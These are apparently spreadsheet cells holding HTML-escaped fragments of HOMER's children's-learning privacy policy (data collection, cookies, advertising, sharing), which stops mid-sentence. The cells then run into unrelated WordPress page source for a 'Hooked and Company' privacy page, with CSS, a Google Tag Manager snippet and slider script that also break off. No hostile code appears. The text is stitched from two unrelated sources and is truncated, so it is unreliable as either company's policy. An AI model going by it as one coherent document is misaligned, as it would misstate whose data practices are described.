&lt;p&gt;Please carefully read this Privacy Policy, which is part of our &lt;a href="https://learnwithhomer.com/terms"&gt;Terms of Use&lt;/a&gt;, before using our Services. If you do not agree with the Terms of Use and/or this Privacy Policy, you must refrain from using our Services.</t>
  </si>
  <si>
    <t>By accessing or using our Services, you agree to our use of your information consistent with the Terms of Use and this Privacy Policy.&lt;/p&gt;
&lt;p&gt;Please review the &lt;a href="#CP"&gt;“Children’s Privacy”&lt;/a&gt; section below for details on HOMER’s information collection, use, and sharing practices related to information collected from children.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;&lt;a name="IWC"&gt;&lt;strong&gt;INFORMATION WE COLLECT&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Information You Provide To Us&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We collect information you as the adult choose to share with us, including information you enter through the Services. For example, if you are an adult user of the Services or visitor to the Site, when you:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;strong&gt;- Create an account to use the Services or request further information about the Services&lt;/strong&gt;, we may collect contact information (such as your name, email address, and phone number), registration data (such as your display name and year of birth, child’s first name and date of birth, child’s interests, username, password, and child’s age), and billing and payment information;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- Authenticate your identity&lt;/strong&gt;, we may collect your name; e-mail address; username; password and other information and documentation to authenticate your identity and verify your permission to allow your child to interact with the Services in compliance with applicable laws and regulations.&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- Interact with the Services&lt;/strong&gt;, we may collect information related to your and your child’s completion of activities, interests, and use of our Services as well as other information you enter through the Services;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- Contact us with questions or for customer service&lt;/strong&gt;, we may collect contact information (such as your name, email address, and phone number) as well as any information you provide in connection with your outreach;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- Participate in promotions, offers, programs, events, surveys, and sweepstakes&lt;/strong&gt;, we may collect basic contact information and any other information you provide in connection with these activities; and&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- Refer others to HOMER&lt;/strong&gt;, we may collect the contact information (such as name and email address) you provide us about those persons.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once you, as an adult, are onboarded and authenticated, your child may begin to use the Services.</t>
  </si>
  <si>
    <t>Adults provide HOMER with basic information about the child as listed above and allow the child to use the adult’s account on the adult’s devices. HOMER then collects information about the device (as identified below), the account log in information, information related to the status of the child’s completion of the activities offered through the Services (“Child Activity Information”), and related automatically collected information (as described below).&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;&lt;a name="IWCTAM"&gt;&lt;strong&gt;Information We Collect Through Automated Means&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may automatically collect, receive, and store certain information in connection with the actions you take on the Services and in connection with use of the Services (“&lt;strong&gt;Device and Usage Data&lt;/strong&gt;”). As discussed further below in the “Cookies &amp;amp; Similar Technologies” section, we and our service providers, may use a variety of technologies, including cookies, to assist in this information collection. For example, each time you use the Services, we may automatically collect the type of web browser and operating system you use, the type of device you use (including mobile devices), your IP address, Internet service provider, unique device identifiers, device hardware specifications, other installed software and other information in accordance with your device settings and permissions.</t>
  </si>
  <si>
    <t>We may also collect the pages you view, referring and exit pages, the date and time of your visit, the number of clicks to, from, and within the Services, time spent on each page, usage preferences, and search terms.&lt;/p&gt;
&lt;p&gt;We may also collect different types of information about your location, including general location information (such as your IP address and ZIP code) and we may use that information to customize the Services with location-based information and features.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Information We Collect from Other Sources&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; We may collect information from other sources, such as payment, analytics, and security service providers, survey and marketing providers, social networks, and researchers.  For example, we utilize certain analytics tools to improve the Services experience for users.</t>
  </si>
  <si>
    <t>We may also collect information you as the adult have authorized the social networking service to share with us (such as your user ID, public profile information, email address, birthday, friends list, and pages you have “liked”). We may aggregate the characteristics and browsing habits of users, on an anonymized basis, to provide products and services that are more tailored. We may also receive your information when a user provides us with your contact information as part of a referral feature.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;&lt;a name="HWUI"&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>HOW WE USE INFORMATION&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt; We use adults’ information to:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Provide you and your child with the Services, information you request, and a customized experience;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Manage, verify, and authenticate your account;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Engage in transactions, including contacting you about your account, billing, remitting, or charging you,  and processing payments;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Improve the Services and our marketing, including customization and personalization;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt; Provide you with effective customer service;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Communicate with you about the Services and contact you with special offers, promotional information, content, publications, and other information we believe will be of interest to you (in accordance with any privacy preferences you have expressed to us) via mail, email, telephone, text messaging, and/or push notifications and display media;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Analyze use of the Services and improve the content, functionality, and usability of the Services, enhance the user experience, and improve our business;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Invite you to participate in promotions, sweepstakes, surveys and provide feedback to us;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Secure the Services and investigate and help prevent fraud, security issues, and abuse;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Understand, detect, and resolve problems with the Services and other issues being reported;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Comply with any procedures, laws, and regulations where necessary for our legitimate interests or legitimate interests of others;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Establish, exercise, or defend our legal rights where necessary for our legitimate interests or the legitimate interests of others, including the enforcement of our &lt;a href="https://learnwithhomer.com/terms"&gt;Terms of Use&lt;/a&gt;, other usage policies and agreements, and other legal terms or controls, or to engage in other legal matters; and&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Fulfill other requests with your consent and for any other purposes disclosed at the time you provide personal information.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use Child Activity Information to:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Measure the child’s performance in activities;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Adapt the learning experience to the child’s needs;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Assess the child’s progress and provide reports to adults on children’s performance on activities;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Analyze use of the Services and improve the content, functionality, and usability of the Services, enhance the user experience, and improve our business;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Comply with any procedures, laws, and regulations where necessary for our legitimate interests or legitimate interests of others;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Understand, detect, and resolve problems with the Services and other issues being reported;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Comply with any procedures, laws, and regulations where necessary for our legitimate interests or legitimate interests of others;&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Establish, exercise, or defend our legal rights where necessary for our legitimate interests or the legitimate interests of others, including the enforcement of our &lt;a href="https://learnwithhomer.com/terms"&gt;Terms of Use&lt;/a&gt;, other usage policies and agreements, and other legal terms or controls, or to engage in other legal matters; and&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Fulfill other requests with the relevant adult’s consent.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Combined information &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; For the purposes discussed in this Privacy Policy, we may combine the information that we collect through the Services with information that we receive from other sources, both online and offline, and use such combined information in accordance with this Privacy Policy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Aggregate/De-identified Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; We may aggregate and/or de-identify any information collected through the Services so that such information can no longer be linked to you or your device (“Aggregate/De-Identified Information”).</t>
  </si>
  <si>
    <t>We may use Aggregate/De-Identified Information for any purpose, including without limitation for research and marketing purposes, and may also share such data with any third parties in our discretion.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Legal Bases for Use of Your Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The laws of some jurisdictions, including the European Economic Area (“EEA”) and the United Kingdom (“UK”), require that companies only process your “Personal Data” (as that term is defined in the applicable law, like the EU General Data Protection Regulation) if they have a “legal basis” (or justifiable need) for processing your Personal Data. To the extent those laws apply, our legal bases for processing Personal Data are as follows:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;To perform our obligations pursuant to a contract (or pending contract) with you. For example, we will process your Personal Data to comply with our &lt;a href="https://learnwithhomer.com/terms"&gt;Terms of Use&lt;/a&gt; to enter into a contract with you, and to honor our commitments in any contracts that we have with you.&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;For our legitimate interests or the legitimate interests of others.</t>
  </si>
  <si>
    <t>For example, we will process your Personal Data to: operate our business and our Services; identify and fix any issues with our Services; provide customer service; secure the Services; learn more about how our customers use the Services; perform internal analytics; improve the Services and users’ experiences; conduct marketing; provide you with certain information about new products, special offers or other information that we think you may find interesting using the email address which you have provided in accordance with applicable law; make and receive payments; comply with legal requirements and defend our legal rights; prevent fraud; engage in a business change (e.g., sale, merger); and to know the customer to whom we are providing Services.&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;To comply with our legal obligations, such as our obligation to share data with tax authorities.  &lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;With your consent. Where we rely on this basis, you may have the right to withdraw your consent at any time as described in the “Data Protection Rights, Information, and Choices” section below.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Cookies &amp;amp; SIMILAR TECHNOLOGIES&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To collect the information in the “&lt;a href="#IWCTAM"&gt;Information We Collect Through Automated Means&lt;/a&gt;” section above, we and our service providers use web server logs, cookies, tags, SDKs, tracking pixels, localstorage and similar tracking technologies.</t>
  </si>
  <si>
    <t>We use these technologies to improve our Services and in order to offer you as the adult a more tailored experience in the future.&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;A web server log is a file where website activity is stored.&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;An SDK is a set of tools and/or code that we embed in our applications and software to allow third parties to collect information about how users interact with the Services.&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;A cookie is a small text file that is placed on your computer or mobile device when you use the Services, that enables us to: (i) recognize your computer; (ii) store your preferences and settings; (iii) understand the web pages of the Services you have visited; (iv), enhance your user experience by delivering and measuring the effectiveness of content and advertising tailored to your interests; (v) perform searches and analytics; and (vi) assist with security and administrative functions. Some cookies are placed in your browser cache while those associated with Flash technologies are stored with your Adobe Flash Player files.&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;Tracking pixels (sometimes referred to as web beacons or clear GIFs) are tiny electronic tags with a unique identifier embedded in websites, online ads and/or email that are designed to: (1) collect usage information like ad impressions or clicks and email open rates; (2) measure popularity of the Services and associated advertising; and (3) access user cookie.&lt;/li&gt;
	&lt;li&gt;&lt;strong&gt;- &lt;/strong&gt;LocalStorage is a web storage object for storing data on the client – that is, locally, on your computer. Data stored locally has no expiration date and will exist until it's been deleted.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As we adopt additional technologies, we may also gather information through other methods.&lt;/p&gt;
&lt;p&gt;Please note that you can change your settings to notify you when a cookie is being set or updated, or to block cookies altogether.</t>
  </si>
  <si>
    <t>Please consult the “Help” section of your browser for more information (e.g., &lt;a target="_blank" href="https://support.microsoft.com/en-us/help/17442/windows-internet-explorer-delete-manage-cookies"&gt;&lt;u&gt;Internet Explorer&lt;/u&gt;&lt;/a&gt;; &lt;a target="_blank" href="https://support.google.com/chrome/answer/95647?hl=en"&gt;&lt;u&gt;Google Chrome&lt;/u&gt;&lt;/a&gt;; &lt;a target="_blank" href="http://kb.mozillazine.org/Cookies#Firefox"&gt;&lt;u&gt;Mozilla Firefox&lt;/u&gt;&lt;/a&gt;; or &lt;a target="_blank" href="https://support.apple.com/kb/PH5042?locale=en_US"&gt;&lt;u&gt;Apple Safari&lt;/u&gt;&lt;/a&gt;). Please note that by blocking, disabling, or managing any or all cookies, you may not have access to certain features or offerings of the Services.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ONLINE ANALYTICS AND ADVERTISING &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Analytics. &lt;/strong&gt;We may use third-party analytics services (such as those of Google Analytics) as well as self hosted data collection services on our Services to collect and analyze usage information through cookies and similar technologies; engage in auditing, research, or reporting; assist with fraud prevention; and provide certain features to you.</t>
  </si>
  <si>
    <t>To prevent Google Analytics from using your information for analytics, you may install the Google Analytics Opt-out Browser Add-on by clicking &lt;a href="https://tools.google.com/dlpage/gaoptout"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Advertising. &lt;/strong&gt;We may work with a number of companies that assist in marketing our services to you, as the adult, on third party websites, mobile apps, and online services. These third parties may use cookies, web beacons or other tracking technologies to collect information about your use of certain parts of the Services and your activities across other websites and online services, which they may associate with persistent identifiers.</t>
  </si>
  <si>
    <t>Sometimes, these identifiers may be derived from a hashed or encrypted version of personal information such as your email address. We may use this information to measure the performance of our advertising as well, for instance, to evaluate which ads or content our users prefer, or which are most effective. In addition, sometimes we or an advertising partner may tailor advertising to you across different devices.&lt;/p&gt;
&lt;p&gt;Their activities and your choices regarding their use of your information to personalize ads to you are subject to and set out in their own policies.</t>
  </si>
  <si>
    <t>We neither have access to, nor does this Privacy Policy govern, the use of cookies or other tracking technologies that may be placed on your computer, mobile phone, or other device by non-affiliated, third-party providers. As described below, these providers may offer you a way to opt-out of the collection of information that is used for our interest-based advertising to you. We cannot guarantee that these instructions will not change, or that they will continue to be available; they are controlled by each third-party service provider, not us.</t>
  </si>
  <si>
    <t>We do not use Child Activity Information to direct or personalize advertisements, do not advertise to children, and do not present third-party advertising within the Services.&lt;/p&gt;
&lt;p&gt;If you are interested in more information about interest-based advertising and how you can generally control cookies other tracking technologies from being put on your computer to deliver such advertising, you may visit the &lt;a href="http://www.networkadvertising.org/choices"&gt;Network Advertising Initiative’s Consumer Opt-Out link&lt;/a&gt;, the &lt;a href="http://www.aboutads.info/choices/"&gt;Digital Advertising Alliance’s (DAA’s) Consumer Opt-Out link&lt;/a&gt;, or &lt;a href="http://preferences-mgr.truste.com/"&gt;TrustArc’s Advertising Choices Page&lt;/a&gt;. To opt out of the display of interest-based advertising from Google, please visit the &lt;a href="https://www.google.com/settings/ads"&gt;Google Ads Settings&lt;/a&gt; page. For more information and to exercise your choices regarding Facebook and/or Instagram ads, please visit the &lt;a href="https://www.facebook.com/help/1075880512458213"&gt;Facebook Ads Settings&lt;/a&gt; page and/or the &lt;a href="https://help.instagram.com/478880589321969/?helpref=hc_fnav&amp;amp;bc%5b0%5d=Instagram%20Help&amp;amp;bc%5b1%5d=Managing%20Your%20Account"&gt;Instagram Ads Settings&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Notice Concerning Do Not Track.</t>
  </si>
  <si>
    <t>&lt;/strong&gt;Do Not Track (“DNT”) is a privacy preference that users can set in certain web browsers.   We are committed to providing you with meaningful choices about the information collected on our website for third party purposes, and that is why we provide the variety of opt-out mechanisms listed above. Because of the changing state of technology and indecision within the industry regarding the meaning of DNT signals, we currently do not make any guarantee that we will honor DNT signals.</t>
  </si>
  <si>
    <t>Learn more about &lt;a target="_blank" href="https://allaboutdnt.com/"&gt;Do Not Track&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;&lt;a name="HWSI"&gt;&lt;strong&gt; HOW WE SHARE INFORMATION&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt; We will share the information we collect from and about you in the following ways:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;strong&gt;- Service Providers&lt;/strong&gt;:</t>
  </si>
  <si>
    <t>We may provide access to or share your information with select third parties who perform services on our behalf, such as online hosting and maintenance, marketing and promotion design and management, management of e-commerce systems, payment processing, data storage and management, marketing and email delivery, analytics, customer service, security and fraud</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1" /&gt;
	&lt;link rel="profile" href="https://gmpg.org/xfn/11" /&gt;
	&lt;link rel="pingback" href="https://hookedandcompany.com/xmlrpc.php" /&gt;
		&lt;link rel="shortcut icon" href="//hookedandcompany.com/wp-content/uploads/2022/08/favicon.png" type="image/x-icon" /&gt;
		&lt;link rel="apple-touch-icon" href="//hookedandcompany.com/wp-content/themes/porto/images/logo/apple-touch-icon.png" /&gt;
		&lt;link rel="apple-touch-icon" sizes="120x120" href="//hookedandcompany.com/wp-content/themes/porto/images/logo/apple-touch-icon_120x120.png" /&gt;
		&lt;link rel="apple-touch-icon" sizes="76x76" href="//hookedandcompany.com/wp-content/themes/porto/images/logo/apple-touch-icon_76x76.png" /&gt;
		&lt;link rel="apple-touch-icon" sizes="152x152" href="//hookedandcompany.com/wp-content/themes/porto/images/logo/apple-touch-icon_152x152.png" /&gt;
	&lt;title&gt;Privacy Policy &amp;#8211; Hooked and Company&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Hooked and Company &amp;raquo; Feed" href="https://hookedandcompany.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Hooked and Company &amp;raquo; Comments Feed" href="https://hookedandcompany.com/comments/feed/" /&gt;
&lt;script&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/hookedandcompany.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};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&lt;style&gt;
img.wp-smiley,
img.emoji {
	display: inline !</t>
  </si>
  <si>
    <t>important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em ! important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://hookedandcompany.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2' media='all' /&gt;
&lt;style id='wp-block-library-theme-inline-css'&gt;
.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}
&lt;/style&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://hookedandcompany.com/wp-includes/css/classic-themes.min.css?ver=6.2' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink:</t>
  </si>
  <si>
    <t>#f78da7;--wp--preset--color--vivid-red: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#9b51e0;--wp--preset--color--primary: #0088cc;--wp--preset--color--secondary: #e36159;--wp--preset--color--tertiary: #2baab1;--wp--preset--color--quaternary: #383f48;--wp--preset--color--dark: #212529;--wp--preset--color--light: #ffffff;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined:</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='porto-css-vars-css' href='https://hookedandcompany.com/wp-content/uploads/porto_styles/theme_css_vars.css?ver=6.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='js_composer_front-css' href='https://hookedandcompany.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.10.0' media='all' /&gt;
&lt;link rel='stylesheet' id='bootstrap-css' href='https://hookedandcompany.com/wp-content/uploads/porto_styles/bootstrap.css?ver=6.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='porto-plugins-css' href='https://hookedandcompany.com/wp-content/themes/porto/css/plugins.css?ver=6.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='porto-theme-css' href='https://hookedandcompany.com/wp-content/themes/porto/css/theme.css?ver=6.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='porto-shortcodes-css' href='https://hookedandcompany.com/wp-content/uploads/porto_styles/shortcodes.css?ver=6.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='porto-theme-wpb-css' href='https://hookedandcompany.com/wp-content/themes/porto/css/theme_wpb.css?ver=6.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='porto-dynamic-style-css' href='https://hookedandcompany.com/wp-content/uploads/porto_styles/dynamic_style.css?ver=6.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='porto-type-builder-css' href='https://hookedandcompany.com/wp-content/plugins/porto-functionality/builders/assets/type-builder.css?ver=2.4.0' media='all' /&gt;
&lt;link rel='stylesheet' id='porto-style-css' href='https://hookedandcompany.com/wp-content/themes/porto/style.css?ver=6.4.0' media='all' /&gt;
&lt;style id='porto-style-inline-css'&gt;
.side-header-narrow-bar-logo{max-width:170px}#header,.sticky-header .header-main.sticky{border-top:3px solid #ededed}@media (min-width:992px){}.page-top .page-title-wrap{line-height:0}.page-top .page-title:not(.b-none):after{content:'';position:absolute;width:100%;left:0;border-bottom:5px solid var(--porto-primary-color);bottom:-32px}.vc_custom_1666278496748 .wpb_column.vc_column_container.vc_col-sm-12{justify-content:center ! important}
&lt;/style&gt;
&lt;script src='https://hookedandcompany.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.3' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script src='https://hookedandcompany.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://hookedandcompany.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://hookedandcompany.com/wp-json/wp/v2/pages/35" /&gt;&lt;link</t>
  </si>
  <si>
    <t xml:space="preserve">rel="EditURI" type="application/rsd+xml" title="RSD" href="https://hookedandcompany.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://hookedandcompany.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.2" /&gt;
&lt;link rel="canonical" href="https://hookedandcompany.com/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://hookedandcompany.com/?p=35' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://hookedandcompany.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhookedandcompany.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://hookedandcompany.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhookedandcompany.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;!-- Google Tag Manager --&gt;_x005F_x000D_
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':_x005F_x000D_
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],_x005F_x000D_
</t>
  </si>
  <si>
    <t>j =d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=_x005F_x000D_
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);_x005F_x000D_
})(window,document,'script','dataLayer','GTM-WZZHZKK');&lt;/script&gt;_x005F_x000D_
&lt;!-- End Google Tag Manager --&gt;		&lt;script type="text/javascript"&gt;
		WebFontConfig = {
			google: { families: [ 'Open+Sans:400,500,600,700,800','Shadows+Into+Light:400,700','Playfair+Display:400,700' ] }
		};
		(function(d) {
			var wf = d.createElement('script'), s = d.scripts[0];
			wf.src = 'https://hookedandcompany.com/wp-content/themes/porto/js/libs/webfont.js';
			wf.async</t>
  </si>
  <si>
    <t>&lt;script type="text/javascript"&gt;_x005F_x000D_
function OptanonWrapper() { }_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;!-- OneTrust Cookies Consent Notice end for hookedandcompany.com --&gt;&lt;meta name="generator" content="Powered by Slider Revolution 6.5.20 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
&lt;script&gt;function setREVStartSize(e){
			//window.requestAnimationFrame(function() {
				window.</t>
  </si>
  <si>
    <t>RSIW = window.RSIW===undefined ? window.innerWidth : window. RSIW;
				window.</t>
  </si>
  <si>
    <t>RSIH = window. RSIH===undefined ? window.innerHeight : window.</t>
  </si>
  <si>
    <t>RSIH;
				try {
					var pw = document.getElementById(e.c).parentNode.offsetWidth,
						newh;
					pw = pw===0 || isNaN(pw) ? window. RSIW : pw;
					e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);
					e.thumbw = e.thumbw===undefined ?</t>
  </si>
  <si>
    <t>0 : parseInt(e.thumbw);
					 e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);
					e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);
					e.tabhide = e.tabhide===undefined ?</t>
  </si>
  <si>
    <t>0 : parseInt(e.tabhide);
					e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);
					e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ?</t>
  </si>
  <si>
    <t>0 : parseInt(e.mh,0);
					if(e.layout==="fullscreen" || e.l==="fullscreen")
						 newh = Math.max(e.mh,window. RSIH);
					else{
						e.gw = Array.isArray(e.gw) ?</t>
  </si>
  <si>
    <t>e.gw : [e.gw];
